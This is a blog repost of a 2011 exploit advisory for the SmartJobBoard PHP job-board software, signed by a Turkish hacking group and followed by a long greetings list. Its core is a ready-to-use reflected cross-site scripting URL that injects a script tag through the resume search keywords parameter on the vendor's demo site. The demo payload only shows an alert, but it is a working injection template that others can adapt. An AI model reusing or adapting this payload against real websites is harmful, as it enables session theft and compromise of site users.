6 Kasım 2011 Pazar

SmartJobBoard Cross Site Scripting

# Exploit Title: SmartJobBoard XSS
# Date: 05.11.2011 - 18.14
# Author: Mr.PaPaRoSSe
# Tested On: BackTrack 5 - Win7
# Platform: Php

-------------------------------------------------------------


DEMO:
http://www.smartjobboard.com/demo/search-resumes/

Keywords : Enter

http://www.smartjobboard.com/demo/search-results-resumes/?action=search&listing_type[equal]=Resume&keywords[exact_phrase]=%3Cscript%3Ealert%28%22DDz+Mr.PaPaRoSSe%22%29%3C%2Fscript%3E

-------------------------------------------------------------
Contact: paparosse.blogspot.com
Greetz: Http://DarkDevilz.in/
-------------------------------------------------------------
3spi0n - ALEXTRAX - sanTiq0
Deathless - ZyX - Tarxes
53rh4+ - bLaCk_uMo - PeRs
syntaX - Mavi_Karalik - DarkCOD3R
x-Leader - Cyborg - Y2J

~ And All DD'z Family
-------------------------------------------------------------
#~ DarkDevilz - Defence And Destruction Group'z - TURKEY ~#

http://packetstormsecurity.org/files/106637/smartjobboard-xss.txt

Hiç yorum yok:

Yorum Gönder